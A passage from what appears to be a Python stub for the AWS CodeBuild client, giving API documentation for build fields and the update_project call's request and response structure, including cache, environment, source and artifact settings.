This value is available only if the build project's ``packaging`` value is set to ``ZIP`` .
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Information that tells you if encryption for build artifacts is disabled.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **cache** *(dict) --*
Information about the cache for the build.
- **type** *(string) --*
The type of cache used by the build project. Valid values include:
* ``NO_CACHE`` : The build project does not use any cache.
* ``S3`` : The build project reads and writes from and to S3.
* ``LOCAL`` : The build project stores a cache locally on a build host that is only available to that build host.
- **location** *(string) --*
Information about the cache location:
* ``NO_CACHE`` or ``LOCAL`` : This value is ignored.
* ``S3`` : This is the S3 bucket name/prefix.
- **modes** *(list) --*
If you use a ``LOCAL`` cache, the local cache mode. You can use one or more local cache modes at the same time.
* ``LOCAL_SOURCE_CACHE`` mode caches Git metadata for primary and secondary sources. After the cache is created, subsequent builds pull only the change between commits. This mode is a good choice for projects with a clean working directory and a source that is a large Git repository. If you choose this option and your project does not use a Git repository (GitHub, GitHub Enterprise, or Bitbucket), the option is ignored.
* ``LOCAL_DOCKER_LAYER_CACHE`` mode caches existing Docker layers. This mode is a good choice for projects that build or pull large Docker images. It can prevent the performance issues caused by pulling large Docker images down from the network.
.. note::
* You can use a Docker layer cache in the Linux enviornment only.
* The ``privileged`` flag must be set so that your project has the required Docker permissions.
* You should consider the security implications before you use a Docker layer cache.
* ``LOCAL_CUSTOM_CACHE`` mode caches directories you specify in the buildspec file. This mode is a good choice if your build scenario is not suited to one of the other three local cache modes. If you use a custom cache:
* Only directories can be specified for caching. You cannot specify individual files.
* Symlinks are used to reference cached directories.
* Cached directories are linked to your build before it downloads its project sources. Cached items are overriden if a source item has the same name. Directories are specified using cache paths in the buildspec file.
- *(string) --*
- **environment** *(dict) --*
Information about the build environment for this build.
- **type** *(string) --*
The type of build environment to use for related builds.
- **image** *(string) --*
The image tag or image digest that identifies the Docker image to use for this build project. Use the following formats:
* For an image tag: ``registry/repository:tag`` . For example, to specify an image with the tag "latest," use ``registry/repository:latest`` .
* For an image digest: ``registry/repository@digest`` . For example, to specify an image with the digest "sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf," use ``registry/repository@sha256:cbbf2f9a99b47fc460d422812b6a5adff7dfee951d8fa2e4a98caa0382cfbdbf`` .
- **computeType** *(string) --*
Information about the compute resources the build project uses. Available values include:
* ``BUILD_GENERAL1_SMALL`` : Use up to 3 GB memory and 2 vCPUs for builds.
* ``BUILD_GENERAL1_MEDIUM`` : Use up to 7 GB memory and 4 vCPUs for builds.
* ``BUILD_GENERAL1_LARGE`` : Use up to 15 GB memory and 8 vCPUs for builds.
- **environmentVariables** *(list) --*
A set of environment variables to make available to builds for this build project.
- *(dict) --*
Information about an environment variable for a build project or a build.
- **name** *(string) --*
The name or key of the environment variable.
- **value** *(string) --*
The value of the environment variable.
.. warning::
We strongly discourage the use of environment variables to store sensitive values, especially AWS secret key IDs and secret access keys. Environment variables can be displayed in plain text using the AWS CodeBuild console and the AWS Command Line Interface (AWS CLI).
- **type** *(string) --*
The type of environment variable. Valid values include:
* ``PARAMETER_STORE`` : An environment variable stored in Amazon EC2 Systems Manager Parameter Store.
* ``PLAINTEXT`` : An environment variable in plaintext format.
- **privilegedMode** *(boolean) --*
Enables running the Docker daemon inside a Docker container. Set to true only if the build project is be used to build Docker images, and the specified build environment image is not provided by AWS CodeBuild with Docker support. Otherwise, all associated builds that attempt to interact with the Docker daemon fail. You must also start the Docker daemon so that builds can interact with it. One way to do this is to initialize the Docker daemon during the install phase of your build spec by running the following build commands. (Do not run these commands if the specified build environment image is provided by AWS CodeBuild with Docker support.)
If the operating system's base image is Ubuntu Linux:
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 sh -c "until docker info; do echo .; sleep 1; done"``
If the operating system's base image is Alpine Linux, add the ``-t`` argument to ``timeout`` :
``- nohup /usr/local/bin/dockerd --host=unix:///var/run/docker.sock --host=tcp://0.0.0.0:2375 --storage-driver=overlay& - timeout 15 -t sh -c "until docker info; do echo .; sleep 1; done"``
- **certificate** *(string) --*
The certificate to use with this build project.
- **registryCredential** *(dict) --*
The credentials for access to a private registry.
- **credential** *(string) --*
The Amazon Resource Name (ARN) or name of credentials created using AWS Secrets Manager.
.. note::
The ``credential`` can use the name of the credentials only if they exist in your current region.
- **credentialProvider** *(string) --*
The service that created the credentials to access a private Docker registry. The valid value, SECRETS_MANAGER, is for AWS Secrets Manager.
- **imagePullCredentialsType** *(string) --*
The type of credentials AWS CodeBuild uses to pull images in your build. There are two valid values:
* ``CODEBUILD`` specifies that AWS CodeBuild uses its own credentials. This requires that you modify your ECR repository policy to trust AWS CodeBuild's service principal.
* ``SERVICE_ROLE`` specifies that AWS CodeBuild uses your build project's service role.
When you use a cross-account or private registry image, you must use SERVICE_ROLE credentials. When you use an AWS CodeBuild curated image, you must use CODEBUILD credentials.
- **serviceRole** *(string) --*
The name of a service role used for this build.
- **logs** *(dict) --*
Information about the build's logs in Amazon CloudWatch Logs.
- **groupName** *(string) --*
The name of the Amazon CloudWatch Logs group for the build logs.
- **streamName** *(string) --*
The name of the Amazon CloudWatch Logs stream for the build logs.
- **deepLink** *(string) --*
The URL to an individual build log in Amazon CloudWatch Logs.
- **s3DeepLink** *(string) --*
The URL to a build log in an S3 bucket.
- **cloudWatchLogs** *(dict) --*
Information about Amazon CloudWatch Logs for a build project.
- **status** *(string) --*
The current status of the logs in Amazon CloudWatch Logs for a build project. Valid values are:
* ``ENABLED`` : Amazon CloudWatch Logs are enabled for this build project.
* ``DISABLED`` : Amazon CloudWatch Logs are not enabled for this build project.
- **groupName** *(string) --*
The group name of the logs in Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **streamName** *(string) --*
The prefix of the stream name of the Amazon CloudWatch Logs. For more information, see `Working with Log Groups and Log Streams <https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/Working-with-log-groups-and-streams.html>`__ .
- **s3Logs** *(dict) --*
Information about S3 logs for a build project.
- **status** *(string) --*
The current status of the S3 build logs. Valid values are:
* ``ENABLED`` : S3 build logs are enabled for this build project.
* ``DISABLED`` : S3 build logs are not enabled for this build project.
- **location** *(string) --*
The ARN of an S3 bucket and the path prefix for S3 logs. If your Amazon S3 bucket name is ``my-bucket`` , and your path prefix is ``build-log`` , then acceptable formats are ``my-bucket/build-log`` or ``arn:aws:s3:::my-bucket/build-log`` .
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your S3 build log output encrypted. By default S3 build logs are encrypted.
- **timeoutInMinutes** *(integer) --*
How long, in minutes, for AWS CodeBuild to wait before timing out this build if it does not get marked as completed.
- **queuedTimeoutInMinutes** *(integer) --*
The number of minutes a build is allowed to be queued before it times out.
- **buildComplete** *(boolean) --*
Whether the build is complete. True if complete; otherwise, false.
- **initiator** *(string) --*
The entity that started the build. Valid values include:
* If AWS CodePipeline started the build, the pipeline's name (for example, ``codepipeline/my-demo-pipeline`` ).
* If an AWS Identity and Access Management (IAM) user started the build, the user's name (for example, ``MyUserName`` ).
* If the Jenkins plugin for AWS CodeBuild started the build, the string ``CodeBuild-Jenkins-Plugin`` .
- **vpcConfig** *(dict) --*
If your AWS CodeBuild project accesses resources in an Amazon VPC, you provide this parameter that identifies the VPC ID and the list of security group IDs and subnet IDs. The security groups and subnets must belong to the same VPC. You must provide at least one security group and one subnet ID.
- **vpcId** *(string) --*
The ID of the Amazon VPC.
- **subnets** *(list) --*
A list of one or more subnet IDs in your Amazon VPC.
- *(string) --*
- **securityGroupIds** *(list) --*
A list of one or more security groups IDs in your Amazon VPC.
- *(string) --*
- **networkInterface** *(dict) --*
Describes a network interface.
- **subnetId** *(string) --*
The ID of the subnet.
- **networkInterfaceId** *(string) --*
The ID of the network interface.
- **encryptionKey** *(string) --*
The AWS Key Management Service (AWS KMS) customer master key (CMK) to be used for encrypting the build output artifacts.
.. note::
You can use a cross-account KMS key to encrypt the build output artifacts if your service role has permission to that key.
You can specify either the Amazon Resource Name (ARN) of the CMK or, if available, the CMK's alias (using the format ``alias/*alias-name* `` ).
:type id: string
:param id: **[REQUIRED]**
The ID of the build.
:rtype: dict
:returns:
"""
pass
def update_project(self, name: str, description: str = None, source: Dict = None, secondarySources: List = None, artifacts: Dict = None, secondaryArtifacts: List = None, cache: Dict = None, environment: Dict = None, serviceRole: str = None, timeoutInMinutes: int = None, queuedTimeoutInMinutes: int = None, encryptionKey: str = None, tags: List = None, vpcConfig: Dict = None, badgeEnabled: bool = None, logsConfig: Dict = None) -> Dict:
"""
Changes the settings of a build project.
See also: `AWS API Documentation <https://docs.aws.amazon.com/goto/WebAPI/codebuild-2016-10-06/UpdateProject>`_
**Request Syntax**
::
response = client.update_project(
name='string',
description='string',
source={
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
secondarySources=[
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
artifacts={
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
secondaryArtifacts=[
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
cache={
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
environment={
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
serviceRole='string',
timeoutInMinutes=123,
queuedTimeoutInMinutes=123,
encryptionKey='string',
tags=[
{
'key': 'string',
'value': 'string'
},
],
vpcConfig={
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
badgeEnabled=True|False,
logsConfig={
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
)
**Response Syntax**
::
{
'project': {
'name': 'string',
'arn': 'string',
'description': 'string',
'source': {
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
'secondarySources': [
{
'type': 'CODECOMMIT'|'CODEPIPELINE'|'GITHUB'|'S3'|'BITBUCKET'|'GITHUB_ENTERPRISE'|'NO_SOURCE',
'location': 'string',
'gitCloneDepth': 123,
'gitSubmodulesConfig': {
'fetchSubmodules': True|False
},
'buildspec': 'string',
'auth': {
'type': 'OAUTH',
'resource': 'string'
},
'reportBuildStatus': True|False,
'insecureSsl': True|False,
'sourceIdentifier': 'string'
},
],
'artifacts': {
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
'secondaryArtifacts': [
{
'type': 'CODEPIPELINE'|'S3'|'NO_ARTIFACTS',
'location': 'string',
'path': 'string',
'namespaceType': 'NONE'|'BUILD_ID',
'name': 'string',
'packaging': 'NONE'|'ZIP',
'overrideArtifactName': True|False,
'encryptionDisabled': True|False,
'artifactIdentifier': 'string'
},
],
'cache': {
'type': 'NO_CACHE'|'S3'|'LOCAL',
'location': 'string',
'modes': [
'LOCAL_DOCKER_LAYER_CACHE'|'LOCAL_SOURCE_CACHE'|'LOCAL_CUSTOM_CACHE',
]
},
'environment': {
'type': 'WINDOWS_CONTAINER'|'LINUX_CONTAINER',
'image': 'string',
'computeType': 'BUILD_GENERAL1_SMALL'|'BUILD_GENERAL1_MEDIUM'|'BUILD_GENERAL1_LARGE',
'environmentVariables': [
{
'name': 'string',
'value': 'string',
'type': 'PLAINTEXT'|'PARAMETER_STORE'
},
],
'privilegedMode': True|False,
'certificate': 'string',
'registryCredential': {
'credential': 'string',
'credentialProvider': 'SECRETS_MANAGER'
},
'imagePullCredentialsType': 'CODEBUILD'|'SERVICE_ROLE'
},
'serviceRole': 'string',
'timeoutInMinutes': 123,
'queuedTimeoutInMinutes': 123,
'encryptionKey': 'string',
'tags': [
{
'key': 'string',
'value': 'string'
},
],
'created': datetime(2015, 1, 1),
'lastModified': datetime(2015, 1, 1),
'webhook': {
'url': 'string',
'payloadUrl': 'string',
'secret': 'string',
'branchFilter': 'string',
'filterGroups': [
[
{
'type': 'EVENT'|'BASE_REF'|'HEAD_REF'|'ACTOR_ACCOUNT_ID'|'FILE_PATH',
'pattern': 'string',
'excludeMatchedPattern': True|False
},
],
],
'lastModifiedSecret': datetime(2015, 1, 1)
},
'vpcConfig': {
'vpcId': 'string',
'subnets': [
'string',
],
'securityGroupIds': [
'string',
]
},
'badge': {
'badgeEnabled': True|False,
'badgeRequestUrl': 'string'
},
'logsConfig': {
'cloudWatchLogs': {
'status': 'ENABLED'|'DISABLED',
'groupName': 'string',
'streamName': 'string'
},
's3Logs': {
'status': 'ENABLED'|'DISABLED',
'location': 'string',
'encryptionDisabled': True|False
}
}
}
}
**Response Structure**
- *(dict) --*
- **project** *(dict) --*
Information about the build project that was changed.
- **name** *(string) --*
The name of the build project.
- **arn** *(string) --*
The Amazon Resource Name (ARN) of the build project.
- **description** *(string) --*
A description that makes the build project easy to identify.
- **source** *(dict) --*
Information about the build input source code for this build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **secondarySources** *(list) --*
An array of ``ProjectSource`` objects.
- *(dict) --*
Information about the build input source code for the build project.
- **type** *(string) --*
The type of repository that contains the source code to be built. Valid values include:
* ``BITBUCKET`` : The source code is in a Bitbucket repository.
* ``CODECOMMIT`` : The source code is in an AWS CodeCommit repository.
* ``CODEPIPELINE`` : The source code settings are specified in the source action of a pipeline in AWS CodePipeline.
* ``GITHUB`` : The source code is in a GitHub repository.
* ``NO_SOURCE`` : The project does not have input source code.
* ``S3`` : The source code is in an Amazon Simple Storage Service (Amazon S3) input bucket.
- **location** *(string) --*
Information about the location of the source code to be built. Valid values include:
* For source code settings that are specified in the source action of a pipeline in AWS CodePipeline, ``location`` should not be specified. If it is specified, AWS CodePipeline ignores it. This is because AWS CodePipeline uses the settings in a pipeline's source action instead of this value.
* For source code in an AWS CodeCommit repository, the HTTPS clone URL to the repository that contains the source code and the build spec (for example, ``https://git-codecommit.*region-ID* .amazonaws.com/v1/repos/*repo-name* `` ).
* For source code in an Amazon Simple Storage Service (Amazon S3) input bucket, one of the following.
* The path to the ZIP file that contains the source code (for example, `` *bucket-name* /*path* /*to* /*object-name* .zip`` ).
* The path to the folder that contains the source code (for example, `` *bucket-name* /*path* /*to* /*source-code* /*folder* /`` ).
* For source code in a GitHub repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your GitHub account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with GitHub, on the GitHub **Authorize application** page, for **Organization access** , choose **Request access** next to each repository you want to allow AWS CodeBuild to have access to, and then choose **Authorize application** . (After you have connected to your GitHub account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
* For source code in a Bitbucket repository, the HTTPS clone URL to the repository that contains the source and the build spec. You must connect your AWS account to your Bitbucket account. Use the AWS CodeBuild console to start creating a build project. When you use the console to connect (or reconnect) with Bitbucket, on the Bitbucket **Confirm access to your account** page, choose **Grant access** . (After you have connected to your Bitbucket account, you do not need to finish creating the build project. You can leave the AWS CodeBuild console.) To instruct AWS CodeBuild to use this connection, in the ``source`` object, set the ``auth`` object's ``type`` value to ``OAUTH`` .
- **gitCloneDepth** *(integer) --*
Information about the Git clone depth for the build project.
- **gitSubmodulesConfig** *(dict) --*
Information about the Git submodules configuration for the build project.
- **fetchSubmodules** *(boolean) --*
Set to true to fetch Git submodules for your AWS CodeBuild build project.
- **buildspec** *(string) --*
The build spec declaration to use for the builds in this build project.
If this value is not specified, a build spec must be included along with the source code to be built.
- **auth** *(dict) --*
Information about the authorization settings for AWS CodeBuild to access the source code to be built.
This information is for the AWS CodeBuild console's use only. Your code should not get or set this information directly.
- **type** *(string) --*
.. note::
This data type is deprecated and is no longer accurate or used.
The authorization type to use. The only valid value is ``OAUTH`` , which represents the OAuth authorization type.
- **resource** *(string) --*
The resource value that applies to the specified authorization type.
- **reportBuildStatus** *(boolean) --*
Set to true to report the status of a build's start and finish to your source provider. This option is valid only when your source provider is GitHub, GitHub Enterprise, or Bitbucket. If this is set and you use a different source provider, an invalidInputException is thrown.
- **insecureSsl** *(boolean) --*
Enable this flag to ignore SSL warnings while connecting to the project source code.
- **sourceIdentifier** *(string) --*
An identifier for this project source.
- **artifacts** *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``NONE`` : AWS CodeBuild creates in the output bucket a folder that contains the build output. This is the default if ``packaging`` is not specified.
* ``ZIP`` : AWS CodeBuild creates in the output bucket a ZIP file that contains the build output.
- **overrideArtifactName** *(boolean) --*
If this flag is set, a name specified in the build spec file overrides the artifact name. The name specified in a build spec file is calculated at build time and uses the Shell Command Language. For example, you can append a date and time to your artifact name so that it is always unique.
- **encryptionDisabled** *(boolean) --*
Set to true if you do not want your output artifacts encrypted. This option is valid only if your artifacts type is Amazon Simple Storage Service (Amazon S3). If this is set with another artifacts type, an invalidInputException is thrown.
- **artifactIdentifier** *(string) --*
An identifier for this artifact definition.
- **secondaryArtifacts** *(list) --*
An array of ``ProjectArtifacts`` objects.
- *(dict) --*
Information about the build output artifacts for the build project.
- **type** *(string) --*
The type of build output artifact. Valid values include:
* ``CODEPIPELINE`` : The build project has build output generated through AWS CodePipeline.
* ``NO_ARTIFACTS`` : The build project does not produce any build output.
* ``S3`` : The build project stores build output in Amazon Simple Storage Service (Amazon S3).
- **location** *(string) --*
Information about the build output artifact location:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output locations instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output bucket.
- **path** *(string) --*
Along with ``namespaceType`` and ``name`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the path to the output artifact. If ``path`` is not specified, ``path`` is not used.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``NONE`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in the output bucket at ``MyArtifacts/MyArtifact.zip`` .
- **namespaceType** *(string) --*
Along with ``path`` and ``name`` , the pattern that AWS CodeBuild uses to determine the name and location to store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
* ``BUILD_ID`` : Include the build ID in the location of the build output artifact.
* ``NONE`` : Do not include the build ID. This is the default if ``namespaceType`` is not specified.
For example, if ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
- **name** *(string) --*
Along with ``path`` and ``namespaceType`` , the pattern that AWS CodeBuild uses to name and store the output artifact:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output names instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , this is the name of the output artifact object. If you set the name to be a forward slash ("/"), the artifact is stored in the root of the output bucket.
For example:
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to ``MyArtifact.zip`` , then the output artifact is stored in ``MyArtifacts/*build-ID* /MyArtifact.zip`` .
* If ``path`` is empty, ``namespaceType`` is set to ``NONE`` , and ``name`` is set to "``/`` ", the output artifact is stored in the root of the output bucket.
* If ``path`` is set to ``MyArtifacts`` , ``namespaceType`` is set to ``BUILD_ID`` , and ``name`` is set to "``/`` ", the output artifact is stored in ``MyArtifacts/*build-ID* `` .
- **packaging** *(string) --*
The type of build output artifact to create:
* If ``type`` is set to ``CODEPIPELINE`` , AWS CodePipeline ignores this value if specified. This is because AWS CodePipeline manages its build output artifacts instead of AWS CodeBuild.
* If ``type`` is set to ``NO_ARTIFACTS`` , this value is ignored if specified, because no build output is produced.
* If ``type`` is set to ``S3`` , valid values include:
